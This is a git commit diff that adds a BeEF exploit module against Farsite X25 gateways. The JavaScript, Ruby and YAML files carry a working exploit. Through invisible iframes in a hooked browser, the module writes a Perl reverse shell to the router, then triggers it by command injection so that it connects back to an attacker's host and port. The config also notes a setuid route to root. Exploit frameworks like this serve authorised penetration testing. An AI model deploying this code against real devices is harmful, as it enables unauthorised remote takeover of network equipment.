Merge pull request #1301 from wireghoul/master

FarLinX X25 auth RCE module
2016-10-07 16:17:02 +11:00
parent 4a5c2f0c44 b7ed74199c
commit d47c69abb3
3 changed files with 74 additions and 0 deletions
--- a/modules/exploits/farsite_x25_remote_shell/command.js
+++ b/modules/exploits/farsite_x25_remote_shell/command.js
@@ -0,0 +1,39 @@
+//
+beef.execute(function() {
+
+  var rhost = '<%= @rhost %>'; 
+  var scheme = '<%= @scheme %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+
+
+  writefile = function() {
+    var revshell='use+IO;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}';
+    revshell = revshell + '$c=new IO::Socket::INET(PeerAddr,"' + lhost + ':' + lport +'");';
+    revshell = revshell + 'STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};';
+    //var x25_write_iframe_<%= @command_id %>= beef.dom.createInvisibleIframe();
+    var x25w_<%= @command_id %>= beef.dom.createInvisibleIframe();
+    var uri = scheme + '://' + rhost + "/fsSaveUIPersistence.php?strSubmitData=" + revshell;
+    //About to hit uri
+    x25w_<%= @command_id %>.setAttribute('src', uri);
+  };
+
+  validate = function() {
+  };
+
+  exploit = function() {
+    //Command injecting on the router
+    var x25e_<%= @command_id %> = beef.dom.createInvisibleIframe();
+    var uri = scheme + '://' + rhost + "/fsx25MonProxy.php?strSubmitData=start+|perl</http/htdocs/fsUI.xyz;echo";
+    x25e_<%= @command_id %>.setAttribute('src', uri);
+  };
+
+  try {
+    writefile();
+    setTimeout(exploit,3000);
+  } catch (e) {
+    beef.debug(peer + " - Exploit failed: " + e.message);
+  }
+
+});
--- a/modules/exploits/farsite_x25_remote_shell/config.yaml
+++ b/modules/exploits/farsite_x25_remote_shell/config.yaml
@@ -0,0 +1,12 @@
+#
+beef:
+    module:
+        farsite_X25_remote_shell:
+            enable: true
+            category: "Exploits"
+            name: "Farsite X25 gateway remote code execution"
+            description: "This module exploits CVE-2014- to write a payload to the router and CVE-2014- to execute it. Once you have shell you can use the setuid /http/bin/execCmd to execute commands as root."
+            authors: ["Wireghoul"]
+            target:
+                working: ["All"]
+
--- a/modules/exploits/farsite_x25_remote_shell/module.rb
+++ b/modules/exploits/farsite_x25_remote_shell/module.rb
@@ -0,0 +1,23 @@
+#
+class Farsite_x25_remote_shell < BeEF::Core::Command
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    return [
+      { 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore',
+          'store_fields' => ['http'], 'store_data' => [['HTTP'],['HTTPS']],
+          'valueField' => 'http', 'displayField' => 'http', 'mode' => 'local', 'autoWidth' => true
+      },
+      { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.0.0.1' },
+      { 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => "#{beef_host}" },
+      { 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'      }
+    ]
+  end
+
+  def post_execute
+        save({'result' => @datastore['result']})
+  end
+
+end
+